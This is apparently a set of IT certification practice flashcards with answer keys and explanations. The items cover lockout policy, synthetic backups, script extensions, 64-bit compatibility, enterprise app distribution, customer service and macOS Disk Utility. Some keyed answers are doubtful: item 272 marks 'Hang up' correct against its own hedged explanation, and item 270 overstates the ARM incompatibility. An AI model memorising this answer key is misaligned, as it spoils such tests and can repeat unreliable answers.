Given the unpredictable state of IT staffing, the software might be available with paid-for support to obtain updates, monitor and fix security issues, and provide technical assistance.

With licensing, commercial software must be used within the constraints of its license, which is likely to restrict the number of devices on which the software can be installed.

Complex apps can have a substantial and expensive user-training requirement, which can be an ongoing cost as new versions can introduce interface or feature changes.

When selecting applications for installation on desktops, proper security considerations need to be made regarding potential impacts to the device (computer) and the network.

267
Q

An attacker is trying multiple times to log in to a user’s phone, but the phone ends up being disabled. What is this called?

Failed attempts lockout

Use timeout/screen lock

Disable AutoRun

Concurrent logins

A

Failed attempts lockout

Failed attempts lockout is when a maximum number of incorrect sign-in attempts occur within a certain period. Once the maximum number of incorrect attempts has been reached, the account will be disabled.

Concurrent logins limit the number of simultaneous sessions a user can open. Most users should only need to sign in to one computer at a time.

A use timeout/screen lock locks the desktop if the system detects no user-input device activity. Users should not rely on this and should lock the computer manually when leaving it unattended.

Disable AutoRun so that malware cannot be installed automatically. On some versions of Windows, inserting an optical disc or attaching a USB drive runs the AutoRun command, which can install software without user action.

268
Q

A technician creates full backups by starting the chain with an initial full backup as normal and afterward making a series of incremental backups. Which of the following backups is this?

Synthetic

Frequency

On-site backup storage

Retention

A

Synthetic

A synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.

Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.

Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.

On-site backup storage means that the production system and backup media are in the same location. Having storage in the same location risks losing both the production and backup copies of the data.

269
Q

Which of the following extensions combines a scripting language with hundreds of prebuilt modules called cmdlets that can access and change most components and features of Windows and Active Directory components and features?

.py

.js

.ps1

.sh

A

.ps1

.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.

.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line that designates which interpreter to use, such as Bash or Ksh.

.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Most web servers and browsers are configured with a JavaScript interpreter.

.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.

270
Q

A software developer is looking at installing a new 64-bit program that will help to streamline coding and optimize workflow. What types of systems can the developer install it on?

64-bit, 32-bit, and ARM

64-bit and 32-bit

64-bit only

32-bit

A

64-bit only

A 64-bit application requires a 64-bit CPU and OS platform. Like operating systems, software applications can be developed as 32-bit or 64-bit software.

64-bit applications cannot be installed on a 32-bit platform. Some apps may have both 32-bit and 64-bit versions.

32-bit applications, however, can usually be installed on 64-bit platforms. They will run on a 64-bit OS, although if a 64-bit version is available, it is probably better to run the 64-bit version if possible.

64-bit applications for personal computers cannot run on Advanced RISC Machines (ARM) architecture. ARM is an architecture for smartphones and tablets.

271
Q

What options does a company have when it wants to create and deliver a custom app for its employees without using a public store? (Select all that apply.)

SELECT ALL THAT APPLY

Bootleg App Store

Managed Google Play

Developer Mode

Apple Business Manager

A

Managed Google Play
Apple Business Manager

Apple operates enterprise developer and distribution programs to allow private app distribution via Apple Business Manager.

Google’s Play Store has a private channel option for enterprise app distribution called Managed Google Play.

Developer mode is a mobile-device feature designed for testing apps during development. It has no connection to how an app is delivered, whether publicly or privately.

A bootleg app store is where users can find bootleg apps that closely mimic legitimate apps; this is a way of pirating apps without paying for them. It is not a private distribution channel.

272
Q

A technician is working with a customer who is being unreasonable. Which of the following skills should the technician use? (Select all that apply.)

SELECT ALL THAT APPLY

Hang up.

Do not take complaints personally.

Be judgmental.

Identify early that the customer is angry.

A

Hang up.
Do not take complaints personally.
Identify early that the customer is angry.

Identify early that the customer is angry and try to calm the situation down by using a low voice and soothing language and by focusing on positive actions.

Do not take complaints personally and do not express any anger toward the customer.

Hanging up should be guided by whatever policy the organization has in place, but in general, if a customer is abusive or threatening, issue a caution to warn them about this behavior.

Being judgmental is not a skill that will help in this situation. Do not assume that the customer lacks knowledge about the system.

273
Q

A user has a Mac computer but likes Windows better for functionality and compatibility purposes. The user wants to sell their computer on an online marketplace and wipe their presence from the computer. Which of the following will help them accomplish this?

Disk Utility

Remote Disc

Finder

Dock

A

Disk Utility

The Disk Utility app can be used to verify or repair a disk or file system. It can also be used to erase a disk with security options if users are selling or passing on a Mac.

The Finder is the macOS equivalent of File Explorer in Windows. It lets the user navigate all the files and folders on a Mac.

Since 2016, no Apple Mac has been sold with an internal CD/DVD drive. The Remote Disc app lets users access a CD/DVD drive on another Mac or Windows computer.

The Dock at the bottom of the screen gives one-click access to users’ favorite apps and files, similar to the taskbar in Windows.
